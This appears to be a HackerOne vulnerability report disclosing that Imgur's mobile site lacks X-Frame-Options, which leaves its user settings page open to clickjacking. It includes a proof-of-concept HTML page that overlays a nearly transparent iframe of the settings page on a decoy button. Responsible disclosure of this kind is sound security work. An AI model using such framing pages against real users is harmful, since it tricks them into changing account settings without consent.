Imgur: Attack User Privacy Settings - X-Frame-Options missing on m.imgur.com/user/username/settings

2015-12-03T08:43:34
ID H1:103178
Type hackerone
Reporter kasser
Modified 2016-05-04T04:13:46

Description

Hello, I would like to report that almost entire mobile web site is vulnerable to clickjacking attacks, Maybe the most important critical part the /settings node, As an attacker could force a user to change his privacy settings with only two clicks, please see live video demonstration, of course this is vulnerable under mobile browsers, Also attached PoC could be tested under desktop browser by changing User-Agent header to a mobile browser (ex: UCBrowser) using User-Agent-Switcher firefox/chrome addon

PoC: Please change username with your actual username, to successfully test this PoC <html> <head> <title>Clickjack test page</title> <style> iframe { width: 900px; height: 800px; /* Use absolute positioning to line up update button with fake button */ position: absolute; top: 100px; left: 100px; z-index: 2; /* Hide from view */ -moz-opacity: 0.2; opacity: 0.2; filter: alpha(opacity=0.2); } button { position: absolute; top: 330px; left: 100px; z-index: 1; width: 65px; } </style> </head <body> <p>website is VULNERABLE to click jacking!</p> <iframe src="http://m.imgur.com/user/username/settings" height="700" width="1000"></iframe> </body> </html>